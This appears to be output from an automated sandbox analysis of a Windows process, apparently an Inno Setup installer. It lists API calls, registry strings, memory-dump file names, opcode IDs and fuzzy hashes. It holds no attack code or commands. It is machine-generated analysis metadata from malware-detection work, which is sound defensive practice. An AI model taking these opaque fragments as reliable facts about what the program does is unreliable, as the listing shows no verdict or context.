                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ...\
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2998766281-983595016
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2508298434-591603554
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8f972abd232c763f3c36dc63a9cb065ea194a46f499b988bc3bcbbac73c3597
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8f972abd232c763f3c36dc63a9cb065ea194a46f499b988bc3bcbbac73c3597
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$_iu
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3498533004-10593223
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 07362118cdce437275e731559fb031e23df8ab72a9a9735788e52f6b9d753cfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07362118cdce437275e731559fb031e23df8ab72a9a9735788e52f6b9d753cfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                                                                                                                                                                                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Class$InfoRegisterUnregister
                                                                                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3749476976-2766056989
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52ab2b6b56ae1e8b590a77f736e7a6459437f656fc00639e046372015fcf8e28
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52ab2b6b56ae1e8b590a77f736e7a6459437f656fc00639e046372015fcf8e28
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                                                                                                                                                                                                                                                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$Attributes$Move
                                                                                                                                                                                                                                                                                                                                                                  • String ID: isRS-%.3u.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3839737484-3657609586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d2f0ef2c8d2c69e59812858b9b2bb046ce1f180a5ea43ef50a61995ac20c358
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d2f0ef2c8d2c69e59812858b9b2bb046ce1f180a5ea43ef50a61995ac20c358
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A480A570ObjectSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1230475511-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: k H
• API String ID: 65125430-1447039187
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 1312246647-2435364021
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                                                                                                                                                                                                                                                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3850602802-3720027226
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 345551639f8b27766301e9e59f8d3f8ac3a07f1b0a74ed7456ec139a41780bf8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 345551639f8b27766301e9e59f8d3f8ac3a07f1b0a74ed7456ec139a41780bf8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: D$x^I
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3798668922-903578107
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d60ed255e20571b71141afc2cf93a9e2f93bc71f51a1d4f388e25b9cf259bfea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d60ed255e20571b71141afc2cf93a9e2f93bc71f51a1d4f388e25b9cf259bfea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00478673
                                                                                                                                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                                                                                                                                                                                                                                                                                                  • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wnd=$%x
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1381870634-2927251529
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1748579591-1013271723
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
Strings
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
• PendingFileRenameOperations, xrefs: 00455A2C
• PendingFileRenameOperations2, xrefs: 00455A3B
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 00483652
• CSDVersion, xrefs: 0048367C
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
